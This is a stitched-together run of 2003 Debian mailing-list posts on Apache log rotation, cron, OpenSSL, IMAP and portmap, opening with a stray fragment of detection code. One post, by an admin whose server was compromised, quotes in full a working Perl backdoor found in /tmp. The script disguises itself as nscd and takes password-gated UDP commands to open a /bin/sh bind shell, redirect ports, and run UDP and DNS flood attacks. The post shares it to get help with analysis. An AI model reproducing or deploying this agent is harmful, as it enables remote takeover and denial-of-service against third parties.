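    for finding in detect(SAMPLE_LOG):
        print(finding)
```
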

Re: apache

2003-06-10 Thread Jamie Heilman
Martynas Domarkas wrote:
> 
> Thanks, but I really do not like installation of another packages. There
> must be a way to do this with apache configuration.

Martynas Domarkas wrote:
> 
> Thanks a lot. This is nice solution, but I still like apache do the job,
> and let logrotate simply rotate /var/log/apache/*.log. I feel like I have
> seen somewhere some piece of shell command in httpd.conf.

Martynas Domarkas wrote:
> 
> Yes, of course. But in this case I will invoke rotatelogs... I don't
> like it.

As you've exhausted the other possibilities, why not
read the fine manual: http://httpd.apache.org/docs/logs.html

-- 
Jamie Heilman   http://audible.transient.net/~jamie/
"Most people wouldn't know music if it came up and bit them on the ass."
-Frank Zappa



cronjob stuck

2003-06-10 Thread Dale Amon
Just ran across an interesting prob, wondered if
anyone else has seen it. I added a repeating entry
to /etc/cron.d/foo that ran every */5 minutes. I
then tried to get rid of it... It will not die.

I moved the file out of /etc/cron.d and it still
is running.

I cp'd the file and deleted the old one in case
cron remembered the inode (rather a long shot).
No change.

I did /etc/init.d/cron stop; /etc/init.d/cron start;
still it repeats.

I did updatedb and locate cron; can't find it cached
anywhere.

cron doesn't seem to have any flush options and no
indication that it should be caching across executions.

I could certainly (I hope!) get rid of it by rebooting
but I can't do that with this system at this time.

Has anyone else had trouble making vixie cron STFU? Am
I hallucinating? Is my brain in need of Coke and M&M's?

-- 
--
   IN MY NAME:Dale Amon, CEO/MD
  No Mushroom clouds over Islandone Society
London and New York.  www.islandone.org
--



Re: strange broadcast packets

2003-06-10 Thread Andreas Wüst
Hi Phillip

On Dienstag, 10-Jun-03 at 19:59:40, Phillip Hofmeister wrote:

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> On Tue, 10 Jun 2003 at 07:21:25PM +0100, Andreas W?st wrote:
>> Hi
>> 
>>> Hello,
>>> 
>>> isn't perhaps 10.208.64.1 your dhcp server and aren't this reply to
>>> dhcp requests from clients?
>> 
>> No lan here.. !!
> 
> That IP address might be used by your cable modem service as an
> internal management address to hand out IP addresses. Or it might even
> be your bridge (cable modem). In either case. This is not something to
> be worried about. In fact I made a special rule in my iptables so such
> packets don't get logged.

Cool, thanks a lot for your help!!

So, can I happily block them? As it
seems, unfortunately I have to keep udp port 68 stateful open, to renew
the dhcp lease, no?

-- 
All the best, and really thanks a lot for your answers,
Andi



Re: nautilus and portmapper port 111

2003-06-10 Thread Andreas Wüst
Hello Chris

Thank you for your answer!

On Dienstag, 10-Jun-03 at 21:39:47, Chris Caldwell wrote:

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> Andreas Wüst sent the following message Today:
> 
>> No matter if I try netstat -apn or netstat -atunp as someone pointed out
>> in private, it gives the same result as netstat -tu -l -ee -p, apart
>> from the established connections, namely there is nothing listening in
>> port 111.
> 
> Have you tried "rpcinfo -p localhost" to see if Nautilus is
> registering a connection to portmap?

No, I haven't yet, but will do!

> The newer Gnome installs
> (gnomevfs) depend on fam, which depends on portmap.

Umm, I thought woody gnome wouldn't depend on fam, no?

> I don't
> believe there is a direct dependency from core Nautilus to
> portmap, but possibly some of the Nautilus extras or vfs extras
> are causing the dependency.

Yeah, it's strange. Even stranger, that nautilus won't start at all, if
the connection to port 111 fails!!

-- 
Best wishes,
Andi



Re: cronjob stuck

2003-06-10 Thread Dale Amon
On Tue, Jun 10, 2003 at 10:22:09PM +0100, Dale Amon wrote:
> Has anyone else had trouble making vixie cron STFU? Am
> I hallucinating? Is my brain in need of Coke and M&M's?

Actually I've now done pretty much just that and 
discovered it was a strange coincidence... some other
process was doing exactly the same thing my cronjob was
to do with exactly the same 5 minute interval between
runs and one minute off the execution times I expected!






--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: apache

2003-06-10 Thread Jamie Heilman
Martynas Domarkas wrote:
> Hi. I would like to use date string in apache log file names. Is there a
> way to use some directive in httpd.conf to be parsed as shell command
> like `date +%Y%m%d` or some other way to solve the problem? I will use
> logrotate mechanism of debian, and this date string could be used only
> for file creation after apache process receives SIGUSR1.

Grab the cronolog package, it's easier and less intrusive.

-- 
Jamie Heilman   http://audible.transient.net/~jamie/
"We must be born with an intuition of mortality.  Before we know the words
 for it, before we know there are words, out we come bloodied and squalling
 with the knowledge that for all the compasses in the world, there's only
 one direction, and time is its only measure."  -Rosencrantz





Re: apache

2003-06-10 Thread Martynas Domarkas
An, 2003-06-10 12:01, Jamie Heilman rašė:
> Martynas Domarkas wrote:
> > Hi. I would like to use date string in apache log file names. Is there a
> > way to use some directive in httpd.conf to be parsed as shell command
> > like `date +%Y%m%d` or some other way to solve the problem? I will use
> > logrotate mechanism of debian, and this date string could be used only
> > for file creation after apache process receives SIGUSR1.
> 
> Grab the cronolog package, it's easier and less intrusive.
> 
> -- 
> Jamie Heilman   http://audible.transient.net/~jamie/
> "We must be born with an intuition of mortality.  Before we know the words
>  for it, before we know there are words, out we come bloodied and squalling
>  with the knowledge that for all the compasses in the world, there's only
>  one direction, and time is its only measure."-Rosencrantz


Thanks, but I really do not like installation of other packages. There
must be a way to do this with apache configuration.


-- 
Pagarbiai
IT sistemų administratorius
Martynas Domarkas
tel.: +370 698 44331






Re: apache

2003-06-10 Thread Teun Vink
On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote:
[...]
> 
> Thanks, but I really do not like installation of other packages. There
> must be a way to do this with apache configuration.

You could add a line to your /etc/logrotate.d/apache configuration, 
so it would look something like this:

[...]
   postrotate
      /etc/init.d/apache reload > /dev/null
      mv -f $1.0 $1.`date +"%Y-%m-%d"`
   endscript
[...]

This would rename access.log.0 to access.log.2003-06-10


Regards,


Teun Vink





Re: apache

2003-06-10 Thread Martynas Domarkas
An, 2003-06-10 12:56, Teun Vink rašė:
> On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote:
> [...]
> > 
> > Thanks, but I really do not like installation of other packages. There
> > must be a way to do this with apache configuration.
> 
> You could add a line to your /etc/logrotate.d/apache configuration, 
> so it would look something like this:
> 
> [...]
>    postrotate
>       /etc/init.d/apache reload > /dev/null
>       mv -f $1.0 $1.`date +"%Y-%m-%d"`
>    endscript
> [...]
> 
> This would rename access.log.0 to access.log.2003-06-10
> 
> 
> Regards,
> 
> 
> Teun Vink
> 

Thanks a lot. This is a nice solution, but I'd still like apache to do the job,
and let logrotate simply rotate /var/log/apache/*.log. I feel like I have
seen somewhere some piece of shell command in httpd.conf.


-- 
Pagarbiai
IT sistemų administratorius
Martynas Domarkas
tel.: +370 698 44331






Re[2]: apache

2003-06-10 Thread Dominik Schulz
Perhaps I've got you wrong but wouldn't
--- snip ---
TransferLog "| /usr/sbin/rotatelogs /var/www/domain.tld/logs/domain.tld-%Y-%m-%d_access.log 604800"
--- end ---
do it?

Martynas Domarkas <[EMAIL PROTECTED]> wrote on 10 Jun 2003 13:02:55 +0300:

> An, 2003-06-10 12:56, Teun Vink rašė:
> > On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote:
> > [...]
> > > 
> > > Thanks, but I really do not like installation of other packages. There
> > > must be a way to do this with apache configuration.
> > 
> > You could add a line to your /etc/logrotate.d/apache configuration, 
> > so it would look something like this:
> > 
> > [...]
> >    postrotate
> >       /etc/init.d/apache reload > /dev/null
> >       mv -f $1.0 $1.`date +"%Y-%m-%d"`
> >    endscript
> > [...]
> > 
> > This would rename access.log.0 to access.log.2003-06-10
> > 
> > 
> > Regards,
> > 
> > 
> > Teun Vink
> > 
> 
> Thanks a lot. This is a nice solution, but I'd still like apache to do the job,
> and let logrotate simply rotate /var/log/apache/*.log. I feel like I have
> seen somewhere some piece of shell command in httpd.conf.
> 
> 
> -- 
> Pagarbiai
> IT sistemų administratorius
> Martynas Domarkas
> tel.: +370 698 44331
> 
> 
> 
> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]


Mit freundlichen Gruessen / Best regards
Dominik Schulz





RE: OPENSSL

2003-06-10 Thread Reckhard, Tobias
> I'm trying to generate a 40-bit certificate using OPENSSL. Can 
> anybody tell me if this is possible and with which package?

The RSA keys used in X.509 certificates are typically 1024 or 2048 bits in
length. What length the symmetric key used between two parties that have
authenticated via X.509 certificates (with RSA keys) to subsequently protect
their communication has, is not directly related to the certificate.

There are web browsers that will negotiate 128 bits only if the certificate
presented by the web server is a "step-up certificate". I'm not sure what
makes a certificate a step-up certificate, however, nor if this restriction
still applies to current browsers.

Cheers,
Tobias





Re: OPENSSL

2003-06-10 Thread Berin Lautenbach
Reckhard, Tobias wrote:
> There are web browsers that will negotiate 128 bits only if the
> certificate presented by the web server is a "step-up certificate".
> I'm not sure what makes a certificate a step-up certificate, however,
> nor if this restriction still applies to current browsers.

The step up involved the browser checking the signer was a legitimate CA
to sign a step-up cert and then performing the re-negotiation. The
restriction disappeared when the crypto export laws were all relaxed. You
have to go a fair way back (few years) to get a browser that still only
supports 128bit symmetric in SGC mode.

Cheers,
Berin




Re: Re[2]: apache

2003-06-10 Thread Martynas Domarkas
An, 2003-06-10 13:46, Dominik Schulz rašė: 
> Perhaps I've got you wrong but wouldn't
> --- snip ---
> TransferLog "| /usr/sbin/rotatelogs /var/www/domain.tld/logs/domain.tld-%Y-%m-%d_access.log 604800"
> --- end ---
> do it?
> 
> Martynas Domarkas <[EMAIL PROTECTED]> wrote on 10 Jun 2003 13:02:55 +0300:
> 
> > An, 2003-06-10 12:56, Teun Vink rašė:
> > > On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote:
> > > [...]
> > > > 
> > > > Thanks, but I really do not like installation of other packages. There
> > > > must be a way to do this with apache configuration.
> > > 
> > > You could add a line to your /etc/logrotate.d/apache configuration, 
> > > so it would look something like this:
> > > 
> > > [...]
> > >    postrotate
> > >       /etc/init.d/apache reload > /dev/null
> > >       mv -f $1.0 $1.`date +"%Y-%m-%d"`
> > >    endscript
> > > [...]
> > > 
> > > This would rename access.log.0 to access.log.2003-06-10
> > > 
> > > 
> > > Regards,
> > > 
> > > 
> > > Teun Vink
> > > 
> > 
> > Thanks a lot. This is a nice solution, but I'd still like apache to do the job,
> > and let logrotate simply rotate /var/log/apache/*.log. I feel like I have
> > seen somewhere some piece of shell command in httpd.conf.
> > 
> > 
> > -- 
> > Pagarbiai
> > IT sistemų administratorius
> > Martynas Domarkas
> > tel.: +370 698 44331
> > 
> > 
> > 
> > -- 
> > To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 
> 
> Mit freundlichen Gruessen / Best regards
> Dominik Schulz
> 

Yes, of course. But in this case I will invoke rotatelogs... I don't
like it.


-- 
Pagarbiai
IT sistemų administratorius
Martynas Domarkas
tel.: +370 698 44331








Re: IMAP is too secure...

2003-06-10 Thread Jelmer Barhorst
Hi Richard,

Since libc-client2003debian it's only possible to use an SSL connection. Most
clients support it, but if you really want to allow plaintext IMAP again,
please run 'dpkg-reconfigure libc-client2003debian' and answer Yes to
'Should plaintext passwords be enabled?'.

To enable it manually, create /etc/c-client.cf with the following contents:
--8<--
I accept the risk
set disable-plaintext nil
--8<--

A better solution would be to set your client to use SSL on port 993. The
only thing you still have to worry about are the certificates.

Jelmer


- Original Message -
From: "Hobbs, Richard" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, June 10, 2003 8:32 AM
Subject: IMAP is too secure...


> Hello,
>
> I think my IMAP server has become too secure... I'm using the current
> version of "uw-imapd" and "libc-client2003debian", as listed in stable and
> stable-proposed-updates.
>
> I cannot log into my IMAP server any more... It keeps saying Invalid
> password. I can only assume it's using password encryption, but I don't
> know how to turn it off.
>
> It was never turned on before, but since the upgrade I've been unable to
> retrieve my mail through IMAP. It usually asks in the config whether I
> want clear-text passwords enabled or not, but it wasn't an option this
> time.
>
> Any ideas? I really need to get at the mail.
>
> Thanks in advance...
>
> Hobbs.
>
> --
> Richard Hobbs <[EMAIL PROTECTED]>
> http://mongeese.co.uk | http://unixforum.co.uk
>
> "There's only one way of life, and that's your own" - The Levellers
>
> Registered Linux User: 313906
> _
> Send all your jokes to [EMAIL PROTECTED] !!
> To subscribe, email: [EMAIL PROTECTED]
>





Re: Default Apache install not fit for multiple domains/users

2003-06-10 Thread Stefan Neufeind
Thank you for the information. Am I right that php-scripts then would 
need an execute-bit set? Currently they don't have ...

On 9 Jun 2003 at 17:59, Jon wrote:

> On Mon, 2003-06-09 at 17:28, Phillip Hofmeister wrote:
> > -BEGIN PGP SIGNED MESSAGE-
> > Hash: SHA1
> > 
> > On Mon, 09 Jun 2003 at 09:35:49PM +0200, Stefan Neufeind wrote:
> > > But you mean starting with #! ?? How could I use the normal way of
> > > setting a cgi-handler for calling .php-files? Know what I mean?
> > > 
> > > Using Misc Binary-support (and therefore patching the kernel) seems
> > > no solution to me. Isn't there some way to make it work using
> > > Apache- features?
> > 
> > MISC Binary is not patching the kernel.  MISC Binary comes as an
> > option with the stock kernel.  You might have to compile your own
> > kernel (I don't know, I haven't used a stock Debian kernel in a VERY
> > long time...)
> > 
> 
> The binfmt_misc kernel module is included in the stock Debian kernels,
> AFAIK.  There is a nice package, binfmt-support (ala
> update-alternatives) that allows one to easily configure binfmt_misc:
> 
> 
> Package: binfmt-support
> Support for extra binary formats
> 
> The binfmt_misc kernel module, contained in versions 2.1.43 and later
> of the Linux kernel, allows system administrators to register
> interpreters for various binary formats based on a magic number or
> their file extension, and cause the appropriate interpreter to be
> invoked whenever a matching file is executed. Think of it as a more
> flexible version of the #! executable interpreter mechanism.
> 
> This package provides an 'update-binfmts' script with which package
> maintainers can register interpreters to be used with this module
> without having to worry about writing their own init.d scripts, and
> which sysadmins can use for a slightly higher-level interface to this
> module.





Re: OPENSSL

2003-06-10 Thread Stefan Neufeind
I'm using a 128-bit-cert. But browsers that support less encryption 
(e.g. IE that comes with WinNT4) can't access my SSL-pages because 
the encryption doesn't allow degradation. Is there any way to solve 
this prob? Using Apache with an official SSL-cert.

PS: This just came to my mind when you said "step-up" - cause in my 
case it would be a "step-down", right?

On 10 Jun 2003 at 21:49, Berin Lautenbach wrote:

> Reckhard, Tobias wrote:
> > There are web browsers that will negotiate 128 bits only if the
> > certificate presented by the web server is a "step-up certificate".
> > I'm not sure what makes a certificate a step-up certificate,
> > however, nor if this restriction still applies to current browsers.
> 
> The step up involved the browser checking the signer was a legitimate
> CA to sign a step-up cert and then performing the re-negotiation. The
> restriction disappeared when the crypto export laws were all relaxed.
> You have to go a fair way back (few years) to get a browser that still
> only supports 128bit symmetric in SGC mode.





re: strange broadcast packets

2003-06-10 Thread kuba . jakubik
Hello,

isn't perhaps 10.208.64.1 your dhcp server and aren't this reply to dhcp 
requests from clients?

Carpe Noctem,

Kuba BIGHard Jakubik



unsubscibe

2003-06-10 Thread loretta whitehead
hi my name is loretta i got this really cool incredimail downloaded on my computer.. but it does not work... I've tried everything, my email will come to the incredimail account but i can not respond so i don't want it any more. can you please take it off so i can use my sbcglobal account again. I even had to sign up for a new email address just so i could respond to some of my e mail. that's sad. PLEASE take it off

Re: Default Apache install not fit for multiple domains/users

2003-06-10 Thread Jon
On Tue, 2003-06-10 at 08:24, Stefan Neufeind wrote:
> Thank you for the information. Am I right that php-scripts then would 
> need an execute-bit set? Currently they don't have ...
> 

Unfortunately, yes.  Otherwise you'll get a 500 Internal Server Error or
the like.

- Jon

-- 
[EMAIL PROTECTED]

Administrator, tgpsolutions
http://www.tgpsolutions.com




Re: Default Apache install not fit for multiple domains/users

2003-06-10 Thread Phillip Hofmeister
On Tue, 10 Jun 2003 at 05:24:59PM +0200, Stefan Neufeind wrote:
> Thank you for the information. Am I right that php-scripts then would 
> need an execute-bit set? Currently they don't have ...
> 

They will be treated like a normal binary file, so yes (that is,
if you want your scripts to work).  If on the other hand, you don't
want your sk|pt5 to work then you don't need to set the execute bit.

-- 
Phillip Hofmeister

PGP/GPG Key:
http://www.zionlth.org/~plhofmei/
wget -O - http://www.zionlth.org/~plhofmei/key.txt | gpg --import
--
Excuse #67: Typo in the code 





Re: nautilus and portmapper port 111

2003-06-10 Thread Andreas Wüst
Hi Phillip

On Dienstag, 10-Jun-03 at 01:33:07, Phillip Hofmeister wrote:

> On Tue, 10 Jun 2003 at 12:20:10AM +0100, Andreas Wüst wrote:
>> Hi
>> 
>> Although I can see no evidence for portmapper being run by issuing
>> "netstat -tu -l -ee -p", everytime nautilus is started it connects to
>> port 111, and even gets an answer from there. And even after this
>> connection, I can't see a server listening on port 111 via netstat.
>> 
>> What is going on here? If I block port 111 nautilus won't start.
>> 
>> How can I make sure portmapper is not being run, or at least only in
>> a controlled manner, say for nautilus?
> 
> 
> I usually use a netstat -apn (requires r00t).  It will show you all
> sockets (listening or otherwise) and what app owns them.  The -n makes
> it so it does not resolve the port numbers via /etc/service.

No matter if I try netstat -apn or netstat -atunp as someone pointed out
in private, it gives the same result as netstat -tu -l -ee -p, apart
from the established connections, namely there is nothing listening in
port 111.

Furthermore, package "portmap" is NOT installed, but there are working
connections via 111 when nautilus starts up..

-- 
Best wishes,
Andi





Re: strange broadcast packets

2003-06-10 Thread Andreas Wüst
Hi

> Hello,
> 
> isn't perhaps 10.208.64.1 your dhcp server and aren't this reply to
> dhcp requests from clients?

No lan here.. !!

-- 
Best wishes,
Andi





Re: Re[2]: apache

2003-06-10 Thread Mark L. Kahnt
On Tue, 2003-06-10 at 09:49, Martynas Domarkas wrote:
> An, 2003-06-10 13:46, Dominik Schulz rašė: 
> > Perhaps I've got you wrong but wouldn't
> > --- snip ---
> > TransferLog "| /usr/sbin/rotatelogs /var/www/domain.tld/logs/domain.tld-%Y-%m-%d_access.log 604800"
> > --- end ---
> > do it?
> > 
> > Martynas Domarkas <[EMAIL PROTECTED]> wrote on 10 Jun 2003 13:02:55 +0300:
> > 
> > > An, 2003-06-10 12:56, Teun Vink rašė:
> > > > On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote:
> > > > [...]
> > > > > 
> > > > > Thanks, but I really do not like installation of other packages. There
> > > > > must be a way to do this with apache configuration.
> > > > 
> > > > You could add a line to your /etc/logrotate.d/apache configuration, 
> > > > so it would look something like this:
> > > > 
> > > > [...]
> > > >    postrotate
> > > >       /etc/init.d/apache reload > /dev/null
> > > >       mv -f $1.0 $1.`date +"%Y-%m-%d"`
> > > >    endscript
> > > > [...]
> > > > 
> > > > This would rename access.log.0 to access.log.2003-06-10
> > > > 
> > > > 
> > > > Regards,
> > > > 
> > > > 
> > > > Teun Vink
> > > > 
> > > 
> > > Thanks a lot. This is a nice solution, but I'd still like apache to do the job,
> > > and let logrotate simply rotate /var/log/apache/*.log. I feel like I have
> > > seen somewhere some piece of shell command in httpd.conf.
> > > 
> > > 
> > > -- 
> > > Pagarbiai
> > > IT sistemų administratorius
> > > Martynas Domarkas
> > > tel.: +370 698 44331
> > > 
> > > 
> > > 
> > > -- 
> > > To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> > > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> > 
> > 
> > Mit freundlichen Gruessen / Best regards
> > Dominik Schulz
> > 
> 
> Yes, of course. But in this case I will invoke rotatelogs... I don't
> like it.
> 
> 
> -- 
> Pagarbiai
> IT sistemų administratorius
> Martynas Domarkas
> tel.: +370 698 44331

IIUC, you are wanting to control the file name applied to rotated logs
from Apache, but you seem to be of the belief that Apache itself is
rotating the log files. Unless this has been added since I last read
through the Apache configuration documentation, I don't remember
seeing the log rotation functionality being part of it (although I last
read through the documentation in its entirety several years back.) It is
handled by a separate package, on Debian most commonly logrotate,
regardless of the name applied to the rotated file.
-- 
Mark L. Kahnt, FLMI/M, ALHC, HIA, AIAA, ACS, MHP
ML Kahnt New Markets Consulting
Tel: (613) 531-8684 / (613) 539-0935
Email: [EMAIL PROTECTED]




Re: strange broadcast packets

2003-06-10 Thread Phillip Hofmeister

On Tue, 10 Jun 2003 at 07:21:25PM +0100, Andreas Wüst wrote:
> Hi
> 
> > Hello,
> > 
> > isn't perhaps 10.208.64.1 your dhcp server and aren't this reply to
> > dhcp requests from clients?
> 
> No lan here.. !!

That IP address might be used by your cable modem service as an internal
management address to hand out IP addresses.  Or it might even be your
bridge (cable modem).  In either case.  This is not something to be
worried about.  In fact I made a special rule in my iptables so such
packets don't get logged.

Be well,

- -- 
Phillip Hofmeister

PGP/GPG Key:
http://www.zionlth.org/~plhofmei/
wget -O - http://www.zionlth.org/~plhofmei/key.txt | gpg --import
- --
Excuse #34: Heavy gravity fluctuation move computer to floor rapidly 




unsubscribe

2003-06-10 Thread Johannes Kleinlercher








Re: nautilus and portmapper port 111

2003-06-10 Thread Chris Caldwell

Andreas Wüst sent the following message Today:

AW>  No matter if I try netstat -apn or netstat -atunp as someone pointed out
AW>  in private, it gives the same result as netstat -tu -l -ee -p, apart
AW>  from the established connections, namely there is nothing listening in
AW>  port 111.

Have you tried "rpcinfo -p localhost" to see if Nautilus is
registering a connection to portmap? The newer Gnome installs
(gnomevfs) depend on fam, which depends on portmap. I don't
believe there is a direct dependency from core Nautilus to
portmap, but possibly some of the Nautilus extras or vfs extras
are causing the dependency.

- -- 
Chris Caldwell

Information Systems Coordinator, Enterprise Systems
Information Systems and Services, The George Washington University
caldwell @ gwu . edu | +1 202.994.4674 (w) | +1 202.409.0878 (c)
http://asclepius.tops.gwu.edu | GPG key ID: 0xE52D0BE8

"Formal education can rarely improve the character of a scoundrel."
- Derek Bok, Harvard University




a weird script worm uploaded via php with debian 3.0 ?

2003-06-10 Thread Robert Ebright
Hello,
I logged in to my server today to find that
/usr/sbin/ncsd was running about 50 copies,
since I don't have BIND installed, obviously
something was up...they were also running with
the user www-data...
After a little bit of research I found a new crontab entry
File: /tmp/crontab.LYukbF
0 * * * * /tmp/.nscdrecover

this starts at
auth.log.0:Jun  6 17:00:01 debian PAM_unix[26934]: (cron) session opened for user www-data by (uid=0)
auth.log.0:Jun  6 17:00:02 debian PAM_unix[26934]: (cron) session closed for user www-data
and runs every hour

and under SYSLOG it starts

syslog.3:Jun  6 16:27:27 debian crontab[26795]: (www-data) LIST (www-data)
syslog.3:Jun  6 16:27:28 debian crontab[26798]: (www-data) REPLACE (www-data)
syslog.3:Jun  6 16:27:34 debian crontab[26804]: (www-data) LIST (www-data)
syslog.3:Jun  6 16:27:34 debian crontab[26807]: (www-data) REPLACE (www-data)
syslog.3:Jun  6 17:00:01 debian /USR/SBIN/CRON[26937]: (www-data) CMD (/tmp/.nscdrecover)

so I found /tmp/.ncsdrecover and it looks like
some kind of port scanner/trojan

the contents are pasted below


#!/usr/bin/perl -w

$pass = "J9YcGEyNypkzI";
$str = 'Mess with the best - die like a
rest!'x1337;
use IO::Socket;
use IO::Select;
use POSIX;

sub redir
{
my $port = shift;
my $dest = shift;
$SIG{ALRM} = sub { exit };
alarm 60;
$sa = IO::Socket::INET->new( Proto => "tcp",
Listen => 1, ReuseAddr => 1,   
LocalPort =>$port) or exit;
$sin = $sa->accept or exit;
close($sa);
alarm 0;
$sout = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $dest) or exit;$sin->autoflush(1);
$sout->autoflush(1);
$sel = IO::Select->new($sin, $sout);
while(@sock = $sel->can_read(180)) {
foreach $s(@sock) {
$buf = <$s>; exit unless($buf);
print $sout $buf if($s eq $sin);
print $sin $buf if($s eq $sout);
}}}

sub shell
{
my $port = shift;
$SIG{ALRM} = sub { exit };
alarm 60;
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 1);
accept(X, S);
close(S);
alarm 0;
open STDIN, "<&X";
open STDOUT, ">&X";
open STDERR, ">&X";
close X;
exec("/bin/sh");
}

sub udp
{
my $host = shift;
my $time = shift;
$sock = IO::Socket::INET->new(Proto =>
'udp', PeerAddr => $host,
PeerPort => int(rand 65535))
or exit;   
$sock->autoflush(1);$SIG{ALRM} = sub { exit };
alarm 15 unless(alarm $time);
print $sock $str while(1);
}
}

sub ddns
{
my $host = shift;
my $time = shift;
$sock = new IO::Socket::INET->new(Proto
=> 'udp', PeerAddr => $host,
PeerPort => 53) or exit;
$sock->autoflush(1);
$SIG{ALRM} = sub { exit };
alarm 15 unless(alarm $time);
while(1) {
my $s = int(rand(89)+10);
my $r1 = int(rand(89)+10);
my $r2 = int(rand(89)+10);
my $r3 = int(rand(89)+10);
my $r4 = int(rand(89)+10);
 
send($sock,"$s\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x02$r1\x02$r2\x02$r3\x02$r4\x07in-addr\x04arpa\x00\x00\x0c\x00\x01",0);}}

$0 = '/usr/sbin/nscd'.' 'x100;
exit if fork;
$SIG{ALRM} = 'IGNORE';
$SIG{TERM} = 'IGNORE';
$SIG{CHLD} = 'IGNORE';
$SIG{INT} = 'IGNORE';
$SIG{QUIT} = 'IGNORE';
$SIG{HUP} = 'IGNORE';
open STDIN, "/dev/null";
open STDERR, ">/dev/null";
POSIX::setsid();

$csock = IO::Socket::INET->new(Proto => 'udp',
LocalPort => 1337, ReuseAddr => 1) or
exit;while($string =<$csock>)
{
chop($string);
my ($pw, $cmd, $arg1, $arg2) = split "
", $string;next unless($cmd);
next unless($arg1);
next unless(crypt($pw, $pass) eq $pass);
if ($cmd eq "ping") {
my $bsock =
IO::Socket::INET->new(Proto =>
'udp', PeerAddr => $arg1,
  PeerPort => $arg2,
ReuseAddr => 1) or
next;   
print $bsock"pong ".`uname 
-mnrs`;
close $bsock;
} elsif ($cmd eq "die") {
exit if(crypt($arg1, $pass) eq $pass);
} elsif ($cmd eq "redir") {
redir($arg1, $arg2) unless(fork);
} elsif ($cmd eq "shell") {
shell($arg1) unless(fork);
} elsif ($cmd eq "udp") {
udp($arg1, $arg2) unless(fork);
} elsif ($cmd eq "ddns") {
ddns($arg1, $arg2) unless(fork);
}
}



A little history is that my server was hacked
with some trojan that was sending out SPAM and I
did a fresh reinstall with debian so I could
have automatic updates and the like. I copied
over a few of the home directories from the old
site. Then this all started after a user logged
in on Friday June 6th, first login at 14:16 ending
14:24. The script starts at 14:27


worldspe ftpd26405pm6-s104.amazon. Fri Jun
6 15:06 -
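
A log check for the pattern reported in the message above, added here as an example and not part of the original post: it flags a service account replacing its own crontab and cron jobs that execute from a world-writable directory. The account list, directory list, rule names and the year argument are assumptions of this example; the sample lines are the syslog lines quoted in the message with their wrapped lines rejoined, plus one constructed benign line.

```python
import re
from datetime import datetime
from typing import NamedTuple

# Accounts that run network services and normally never edit their own crontab.
# Assumption for this example: adjust to the accounts present on your system.
SERVICE_ACCOUNTS = {"www-data", "nobody", "daemon"}

# World-writable locations where a legitimate cron job should not live.
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Vixie cron syslog lines, optionally prefixed by "file:" as grep prints them:
#   syslog.3:Jun  6 16:27:28 debian crontab[26798]: (www-data) REPLACE (www-data)
#   syslog.3:Jun  6 17:00:01 debian /USR/SBIN/CRON[26937]: (www-data) CMD (/tmp/x)
LINE_RE = re.compile(
    r"^(?:[\w.\-/]+:)?(?P<ts>[A-Z][a-z]{2}\s+\d+\s[\d:]{8})\s+\S+\s+"
    r"(?P<prog>\S+?)\[\d+\]:\s+\((?P<user>[^)]+)\)\s+"
    r"(?P<action>[A-Z]+)\s+\((?P<detail>.*)\)\s*$"
)


class Finding(NamedTuple):
    when: datetime
    user: str
    rule: str
    detail: str


def analyze(lines, year):
    """Return suspicious cron events in time order.

    Syslog timestamps carry no year, so the caller supplies it.
    Lines that are not cron/crontab events are skipped.
    """
    findings = []
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if m is None:
            continue
        when = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        user, action, detail = m["user"], m["action"], m["detail"]

        if action == "REPLACE" and user in SERVICE_ACCOUNTS:
            # A daemon account installing a crontab is the persistence step.
            findings.append(
                Finding(when, user, "service-account-crontab-replaced", detail))
        elif action == "CMD":
            tokens = detail.split()
            exe = tokens[0] if tokens else ""
            if exe.startswith(WRITABLE_DIRS):
                # The job itself lives where any local user can write.
                findings.append(
                    Finding(when, user, "cron-job-in-world-writable-dir", exe))
    return sorted(findings)


# Lines 1-5: from the message above, wrapped lines rejoined.
# Line 6: constructed benign entry, to show that normal jobs are not flagged.
SAMPLE_LINES = [
    "syslog.3:Jun  6 16:27:27 debian crontab[26795]: (www-data) LIST (www-data)",
    "syslog.3:Jun  6 16:27:28 debian crontab[26798]: (www-data) REPLACE (www-data)",
    "syslog.3:Jun  6 16:27:34 debian crontab[26804]: (www-data) LIST (www-data)",
    "syslog.3:Jun  6 16:27:34 debian crontab[26807]: (www-data) REPLACE (www-data)",
    "syslog.3:Jun  6 17:00:01 debian /USR/SBIN/CRON[26937]: (www-data) CMD (/tmp/.nscdrecover)",
    "syslog.3:Jun  6 17:05:01 debian /USR/SBIN/CRON[27001]: (root) CMD (/usr/bin/updatedb)",
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_LINES, 2003):
        print(f"{f.when:%Y-%m-%d %H:%M:%S}  {f.user:<10} {f.rule}  {f.detail}")
```

The earliest finding gives the time to pivot on when reading the web server and FTP logs for the request or upload that preceded it.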

Re: apache

2003-06-10 Thread Jamie Heilman
Martynas Domarkas wrote:
> 
> Thanks, but I really do not like installation of other packages. There
> must be a way to do this with apache configuration.

Martynas Domarkas wrote:
> 
> Thanks a lot. This is a nice solution, but I'd still like apache to do the job,
> and let logrotate simply rotate /var/log/apache/*.log. I feel like I have
> seen somewhere some piece of shell command in httpd.conf.

Martynas Domarkas wrote:
> 
